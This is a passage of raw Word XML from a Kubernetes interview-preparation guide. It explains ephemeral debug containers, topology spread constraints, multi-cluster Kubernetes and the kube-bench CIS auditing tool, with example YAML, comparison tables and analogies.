        <w:t>distroless container → no shell → cannot use kubectl exec</w:t>
        <w:br/>
        <w:t>Use ephemeral container instead.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Network debugging</w:t>
        <w:br/>
        <w:t>kubectl debug pod/my-pod -it --image=nicolaka/netshoot</w:t>
        <w:br/>
        <w:t>Then run:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * curl</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * ping</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * nslookup</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Inspect filesystem or processes</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Check mounted volumes</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Inspect running processes</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Validate configs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Ephemeral container properties</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Shares Pod namespaces (PID, network)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Cannot expose ports independently</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Cannot restart Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Cannot modify original containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Only for debugging</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example YAML (conceptual)</w:t>
        <w:br/>
        <w:t>ephemeralContainers:</w:t>
        <w:br/>
        <w:t>- name: debug-container</w:t>
        <w:br/>
        <w:t xml:space="preserve">  image: busybox</w:t>
        <w:br/>
        <w:t xml:space="preserve">  command: ["sh"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  targetContainerName: app-container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>kubectl exec vs ephemeral containers</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubectl exec</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Ephemeral Containers</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Works if shell exists</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Works in distroless images</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌ No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅ Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Requires container restart</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Added to Pod spec</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes (temporary)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Command execution</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Full debugging environment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Pod = running car</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * kubectl exec = opening driver door to check dashboard</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * ephemeral container = attaching a temporary mechanic workshop to the car while it is still running</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Cannot be used in all clusters by default (feature gate in older versions)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Cannot modify Pod state</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Not suitable for production logic</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Requires RBAC permission (pods/ephemeralcontainers)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Use official debug images (netshoot, busybox)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Remove ephemeral containers after debugging</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Use instead of SSH-like access</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Combine with logs for faster troubleshooting</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Ephemeral containers in Kubernetes are temporary debug containers that can be injected into a running Pod without restarting it, allowing administrators to troubleshoot live workloads by sharing the same namespaces as existing containers while not being part of the Pod’s original specification or lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q327. What is topology spread constraint?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Topology Spread Constraints in Kubernetes are a scheduling feature that controls how Pods are distributed across failure domains like zones, nodes, or racks to improve availability and balance.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Topology spread constraints ensure that Pods are evenly spread across different “topology domains” (like zones or nodes), instead of being concentrated in one place.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why it is used</w:t>
        <w:br/>
        <w:t>They help to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Improve high availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Avoid single-point-of-failure</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Balance workload across zones/nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Prevent resource hot spots</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Support multi-zone resilience</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What is a “topology domain”?</w:t>
        <w:br/>
        <w:t>A topology domain is a grouping of nodes based on labels like:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Zone (e.g., us-east-1a, us-east-1b)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Node</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Rack</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Region</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Custom labels</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t>Kubernetes scheduler tries to ensure:</w:t>
        <w:br/>
        <w:t>Number of Pods per topology domain ≈ equal distribution</w:t>
        <w:br/>
        <w:t>It compares:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * desired spread</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * actual distribution</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * constraints defined in Pod spec</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example YAML</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Pod</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-app</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  topologySpreadConstraints:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - maxSkew: 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">    topologyKey: topology.kubernetes.io/zone</w:t>
        <w:br/>
        <w:t xml:space="preserve">    whenUnsatisfiable: DoNotSchedule</w:t>
        <w:br/>
        <w:t xml:space="preserve">    labelSelector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      matchLabels:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        app: my-app</w:t>
        <w:br/>
        <w:t xml:space="preserve">  containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: nginx</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key fields explained</w:t>
        <w:br/>
        <w:t>1. topologyKey</w:t>
        <w:br/>
        <w:t>Defines the domain:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * topology.kubernetes.io/zone</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * kubernetes.io/hostname</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. maxSkew</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Allowed imbalance between zones</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Example: maxSkew: 1</w:t>
        <w:br/>
        <w:t xml:space="preserve"> → difference between zones must not exceed 1 Pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. whenUnsatisfiable</w:t>
        <w:br/>
        <w:t>Defines behavior when constraint cannot be met:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * DoNotSchedule → block Pod scheduling</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * ScheduleAnyway → schedule but try best effort</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. labelSelector</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Defines which Pods are part of the spreading rule</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example scenario</w:t>
        <w:br/>
        <w:t>Cluster:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Zone A</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Zone B</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Zone C</w:t>
        <w:br/>
        <w:t>Goal:</w:t>
        <w:br/>
        <w:t>Spread 6 Pods evenly</w:t>
        <w:br/>
        <w:t>Result:</w:t>
        <w:br/>
        <w:t>Zone A → 2 Pods</w:t>
        <w:br/>
        <w:t>Zone B → 2 Pods</w:t>
        <w:br/>
        <w:t>Zone C → 2 Pods</w:t>
        <w:br/>
        <w:t>If imbalance occurs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes adjusts scheduling to restore balance</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Topology spread vs affinity</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Topology Spread</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node Affinity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Even distribution</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Placement rules</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Goal</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Balance Pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Select nodes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Behavior</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Spread evenly</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Match conditions</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Focus</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High availability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node selection</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pods = students</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Zones = classrooms</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Topology spread = teacher ensuring equal number of students in each classroom</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world use cases</w:t>
        <w:br/>
        <w:t>1. Multi-zone applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Ensure API servers run across zones</w:t>
        <w:br/>
        <w:t>2. High availability systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Avoid all replicas in one zone</w:t>
        <w:br/>
        <w:t>3. Load balancing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Prevent node overload</w:t>
        <w:br/>
        <w:t>4. Stateful workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Distributed databases</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Improves fault tolerance</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Prevents resource bottlenecks</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Supports multi-region architecture</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Works automatically with scheduler</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Can delay scheduling if constraints are strict</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Requires enough nodes/zones</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Complex in small clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * May conflict with node affinity rules</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use for critical workloads (APIs, databases)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Combine with anti-affinity for stronger separation</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Set realistic maxSkew</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Ensure sufficient cluster capacity across zones</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Topology Spread Constraints in Kubernetes are scheduling rules that control how Pods are distributed across topology domains such as zones or nodes, ensuring balanced placement to improve high availability, fault tolerance, and resource utilization while preventing uneven concentration of workloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q328. Explain multi-cluster Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Multi-cluster Kubernetes refers to an architecture where multiple independent Kubernetes clusters in Kubernetes are used together to run and manage applications as a unified system.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Instead of one big cluster, you run multiple clusters and manage them together for scalability, reliability, and isolation.</w:t>
        <w:br/>
        <w:t>Each cluster is still independent, but they are operated as part of a single platform strategy.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why multi-cluster Kubernetes is used</w:t>
        <w:br/>
        <w:t>It solves problems that a single cluster cannot handle well:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * High availability across regions</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Disaster recovery</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduced blast radius (failure isolation)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Multi-cloud deployments (AWS + Azure + GCP)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Compliance and data residency requirements</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Scalability beyond one cluster limit</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works (high-level)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        Global Control / Management Layer</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    |</w:t>
        <w:br/>
        <w:t xml:space="preserve">      -----------------------------------</w:t>
        <w:br/>
        <w:t xml:space="preserve">      |               |                |</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Cluster A        Cluster B        Cluster C</w:t>
        <w:br/>
        <w:t xml:space="preserve"> (AWS)            (Azure)          (GCP)</w:t>
        <w:br/>
        <w:t>Each cluster:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Has its own API server</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Runs workloads independently</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Can be in different regions/clouds</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key characteristics</w:t>
        <w:br/>
        <w:t>1. Independence</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Each cluster is self-contained</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Failure in one does NOT affect others</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Central management (optional)</w:t>
        <w:br/>
        <w:t>You can use tools to manage them:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitOps tools (ArgoCD, Flux)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Service meshes (Istio, Linkerd)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cloud tools (GKE Hub, EKS Fleet, Azure Arc)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Distributed workloads</w:t>
        <w:br/>
        <w:t>Apps can be deployed:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Per region</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Per environment (dev, staging, prod)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Per tenant/customer</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Multi-cluster use cases</w:t>
        <w:br/>
        <w:t>1. High availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * If one cluster fails → traffic moves to another</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Disaster recovery</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Backup cluster in another region</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Failover setup</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Global applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Users routed to nearest cluster (low latency)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Multi-tenant isolation</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * One cluster per customer or business unit</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Compliance</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Data stays in specific country/region</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Traffic management in multi-cluster</w:t>
        <w:br/>
        <w:t>You can route traffic using:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Global Load Balancers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * DNS-based routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Service mesh (Istio multi-cluster)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cloud provider routing (Route 53, Cloud DNS, Azure Front Door)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Multi-cluster Kubernetes vs single cluster</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Single Cluster</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Multi-Cluster</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Fault isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Strong</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scalability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Global reach</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Management overhead</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Single cluster = one large factory</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Multi-cluster = multiple factories in different cities, coordinated to produce the same product</w:t>
        <w:br/>
        <w:t>If one factory fails, others continue working.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key challenges</w:t>
        <w:br/>
        <w:t>1. Operational complexity</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * More clusters = more to manage</w:t>
        <w:br/>
        <w:t>2. Networking complexity</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cross-cluster communication is difficult</w:t>
        <w:br/>
        <w:t>3. Consistency</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Keeping configs synced across clusters</w:t>
        <w:br/>
        <w:t>4. Observability</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Harder to monitor multiple clusters together</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Tools used in multi-cluster Kubernetes</w:t>
        <w:br/>
        <w:t>Management</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * ArgoCD / Flux (GitOps)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Rancher</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Anthos (Google)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Azure Arc</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * AWS EKS Fleet Manager</w:t>
        <w:br/>
        <w:t>Networking / service discovery</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Istio</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Linkerd</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Submariner</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use GitOps for consistency</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Automate cluster provisioning</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Centralized observability (Prometheus + Grafana)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Standardize cluster configurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Define clear failover strategies</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Multi-cluster Kubernetes is an architectural approach where multiple independent Kubernetes clusters are deployed across regions or cloud providers and managed together to achieve high availability, disaster recovery, scalability, and isolation while enabling distributed application deployment and centralized or federated management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q329. What is kube-bench?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: kube-bench is an open-source security tool that checks whether a cluster running Kubernetes is configured according to security best practices defined in the CIS Kubernetes Benchmark.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>kube-bench audits your Kubernetes cluster configuration and tells you whether it is secure or not.</w:t>
        <w:br/>
        <w:t>It does not fix issues—it only checks compliance and reports gaps.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why kube-bench is used</w:t>
        <w:br/>
        <w:t>It helps you:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Identify security misconfigurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Ensure compliance with CIS standards</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Improve cluster hardening</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Prepare for audits (SOC2, ISO 27001, etc.)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Validate production readiness</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What is CIS Benchmark?</w:t>
        <w:br/>
        <w:t>CIS (Center for Internet Security) Kubernetes Benchmark defines:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Secure configuration rules for Kubernetes components</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Best practices for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * API server</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * etcd</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * scheduler</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * controller manager</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * kubelet</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What kube-bench checks</w:t>
        <w:br/>
        <w:t>1. Control plane security</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * kube-apiserver flags</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * etcd encryption</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * scheduler configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * controller manager security settings</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Worker node security</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * kubelet configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * file permissions</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * authentication settings</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * audit logs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Policies and permissions</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * RBAC configurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * anonymous access checks</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * insecure ports or flags</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How kube-bench works</w:t>
        <w:br/>
        <w:t>kube-bench → reads node configs + cluster settings → compares with CIS rules → generates report</w:t>
        <w:br/>
        <w:t>It evaluates:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Running Kubernetes components</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Config files (like /etc/kubernetes/)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * API server flags</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * System-level settings</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example output</w:t>
        <w:br/>
        <w:t>[INFO] 1 Control Plane Security Configuration</w:t>
        <w:br/>
        <w:t>[FAIL] 1.2 Ensure that the --anonymous-auth argument is set to false</w:t>
        <w:br/>
        <w:t>[PASS] 1.3 Ensure that the --basic-auth-file argument is not set</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Deployment modes</w:t>
        <w:br/>
        <w:t>1. On master/node</w:t>
        <w:br/>
        <w:t>Run directly on cluster nodes</w:t>
        <w:br/>
        <w:t>2. As a DaemonSet</w:t>
        <w:br/>
        <w:t>Runs kube-bench across all nodes in cluster</w:t>
        <w:br/>
        <w:t>3. In CI/CD pipelines</w:t>
        <w:br/>
        <w:t>Used for pre-production security checks</w:t>
        <w:br/>
